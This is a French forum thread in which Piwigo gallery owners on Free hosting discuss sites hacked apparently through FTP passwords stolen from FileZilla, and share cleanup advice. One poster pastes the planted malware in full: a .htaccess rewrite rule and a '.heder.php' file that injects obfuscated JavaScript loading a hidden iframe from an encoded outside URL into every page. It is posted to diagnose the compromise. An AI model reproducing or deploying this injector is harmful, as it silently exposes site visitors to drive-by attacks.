Et quand je l'ai récupéré par ftp, mon antivirus en a intercepté 2.
Je t'ai transféré un fichier sain, et le site a été réparé.
Tu t'es empressé de tout retransféré, et rebelotte ton site a été en rideau.
Changer ton mot de passe ne servira donc pas de façon certaine.
Et .htaccess chez Free et OVH, c'est comme qui dirait la nuit et le jour.
Moi je verrai à regarder la version et le logiciel du Client FTP.
Mais tu n'es pas obligé de me croire...
http://www.commentcamarche.net/forum/af … #p12005281
Hors ligne
Ca sent le trojan dans le keygen du logiciel FTP piraté ...
^^
Hors ligne
Gotcha a écrit:
Ca sent le trojan dans le keygen du logiciel FTP piraté ...
^^
J'utilise FileZilla donc ....
Je ne dit pas que je ne suis pas fautif mais j'essaie de connaitre la source du problème et je crois que l'idée de nicolas est la plus plausible.
Ma grosse erreur est d'avoir mis un mot de passe unique pour FTP et SQL.
Je suis en train de faire des essais en m'inspirant des quelques recommandations que j'ai pu récolté sur le web.
Je vous tiens au courant si j'ai réussi à m'en sortir.
Hors ligne
musidora a écrit:
J'utilise FileZilla donc ....
Ok.
Tiens nous au courant :-)
Hors ligne
Bonjour.
J'ai le même problème sur 2 pages perso Free, dont une ne contient pas piwigo.
J'avais mis des html à la racine de mes site pour rediriger directement dans le répertoire piwigo, ils étaient vérolés eux aussi.
C'est la deuxième fois que je remets en marche mon piwigo en réuploadant carrément l'original téléchargé sur le site, donc obligé de tout reconfigurer.
Je vais m'empresser de faire une sauvegarde ce coup-ci.
Si je change le mot de passe de ma bdd, où est-ce que je le modifie dans piwigo? Car il faut le donner à l'install.
Si je change mon mot de passe FTP, est-ce qu'il y a quelque chose à configurer dans piwigo?
Que puis-je faire pour sécuriser au final?
Merci d'avance.
sylvanos a écrit:
Si je change le mot de passe de ma bdd, où est-ce que je le modifie dans piwigo? Car il faut le donner à l'install.
dans le fichier include/mysql.inc.php
sylvanos a écrit:
Si je change mon mot de passe FTP, est-ce qu'il y a quelque chose à configurer dans piwigo?
non
Hors ligne
C'est un problème que je vois sur différent forum de webmaster. En gros le seul point commun est Filezilla et d'après les recherches et recoupement c'est le fichier qui conserve le paramètre de connexion à vos ftp qui est utilisé par le troyen.
A essayer :
- changer les mots de passe des ftp;
- dans filezilla ne surtout pas sauvegarder ces mots de passe;
- renvoyer des fichiers sains sur le ftp.
Pour moi ce n'est pas un problème de sécurité avec Piwigo mais plutôt une fonction totalement absurde dans la majorité des programmes : la case se souvenir de moi ou variante, retenir les mots de passes ! C'est une connerie je comprends pas qu'on puisse proposer ce genre de fonction dans un programme !
Hors ligne
flipflip a écrit:
Pour moi ce n'est pas un problème de sécurité avec Piwigo mais plutôt une fonction totalement absurde dans la majorité des programmes : la case se souvenir de moi ou variante, retenir les mots de passes ! C'est une connerie je comprends pas qu'on puisse proposer ce genre de fonction dans un programme !
Je partage ton avis, même si je ne l'aurais pas forcément dit dans ces termes ! Mais il faut avouer que pour Mme Michu, ce n'est pas facile de se rappeler d'un couple login/mot de passe pour voir les photos de ces petits enfants. Elle a déjà du mal avec son numéro de carte bleu qu'elle note derrière sa carte !
Tu noteras d'autre part que cette fonctionnalité "stupide" existe dans piwigo !
Hors ligne
Tu noteras d'autre part que cette fonctionnalité "stupide" existe dans piwigo !
Personne n'est parfait ;)
Hors ligne
Même problème découvert sur mon site il y a deux jours. J'utilise également FileZilla, et j'ai récemment été obligé de réinstallé mon PC qui était truffé de trojans, donc ce explique peut-être cela ...
J'ai plein de fichiers ".heder.php" sur mon site qui ont été modifiés récemment, la présence de ces fichiers vous semble t-elle normale ?
Merci.
Informations complémentaires sur notre problème,
Des fichiers ".htaccess" ont été rajoutés un peu partout avec le contenu suivant :
#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>
En plus ces fichiers font référence aux fichiers ".heder.php" ...
Je ne sais pas ce que vous en pensez, mais le plus sûre ne serait-il pas de tout supprimer et de réinstaller Piwigo ? Car grossière erreur de ma part, je n'ai pas de copie locale ;-(
Un exemple de fichier ".heder.php" :
<?php
$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
chdir($dir);
$dir = getcwd();
chdir($curDir);
return $dir;
}
function callback($data)
{
global $frame_code;
if(preg_match("/(<.*?body.*?>)/i", $data) > 0)
return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);
else return $data.$frame_code;
}
ob_start('callback');
$file = $_GET['qq'];
chdir(get_file_dir_($file));
include($file);
?>
Phil31 a écrit:
Informations complémentaires sur notre problème,
Des fichiers ".htaccess" ont été rajoutés un peu partout avec le contenu suivant :
#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>
En plus ces fichiers font référence aux fichiers ".heder.php" ...
Je ne sais pas ce que vous en pensez, mais le plus sûre ne serait-il pas de tout supprimer et de réinstaller Piwigo ? Car grossière erreur de ma part, je n'ai pas de copie locale ;-(
Rien ne t'empêche de récupérer une copie locale de ta gallerie maintenant, de nettoyer en local tous les fichiers qui n'ont rien à voir avec Piwigo, supprimer les fichiers sur le serveur (avec un client FTP qui ne soit pas vérolé) et de renvoyer les fichiers de Piwigo de ta copie locale vers ton espace FTP.
Les fichiers php et .htaccess vérolés ne sont pas des virus et tu ne risques rien tant qu'ils ne sont pas interprétés (possible si tu as un systèmes apache/php/mysql local tel que Wampserver).
Ceci dit, es-tu chez Free? Dans l'affirmative, je te conseille vivement de changer *tous* tes mots de passe de pages perso, y compris l'accès à MySql via phpmyadmin. Car je doute que ton client FTP soit à l'origine de ce que tu rapportes.
Hors ligne
Eric a écrit:
Rien ne t'empêche de récupérer une copie locale de ta gallerie maintenant, de nettoyer en local tous les fichiers qui n'ont rien à voir avec Piwigo, supprimer les fichiers sur le serveur (avec un client FTP qui ne soit pas vérolé) et de renvoyer les fichiers de Piwigo de ta copie locale vers ton espace FTP.
Changer tous les mots de passe aussi tôt que possible.
Garder les images .jpg .png. et autres de ./galleries/ (et de ./upload/ si ce répertoire existe).
(Tout le reste à la déchiqueteuse: .php .htaccess .tpl .css .html etc...)
Copier un Piwigo tout propre.
Coder à la main un ./include/mysql.inc.php
Changer le mot de passe de tous les utilisateurs et leur adresser le lien pour rétablir leur mot de passe.
En gros.
Mais également vérifier la base de données (table non officielle), intégrité des données.
Bref, beaucoup de boulot.
Hors ligne
Et surtout décoché la case "Se souvenir du mot de passe" ou équivalent en filezilla grrrrrrr.
Hors ligne
Je suis effectivement chez free.
En triant les fichiers de mon site par date, j'arrive à déterminer les fichiers impactés (dates de modification au 07/09/2009 entre 19:25 et 20:05). Il y a 183 fichiers impactés, de type php et htm.
Je vais tenter de les nettoyer à la main, et sinon il me restera la solution de tout virer et de réinstaller...
Je n'ai rien vu d'anormal du coté de la base de données via phpmyadmin.
Concernant l'origine du problème, je doute que ça puisse venir de mon PC puisque j'ai formaté et réinstallé mon PC le 5/9/2009, et qu'à la date du 7/9/2009 je n'avais même pas encore réinstallé FilaZilla...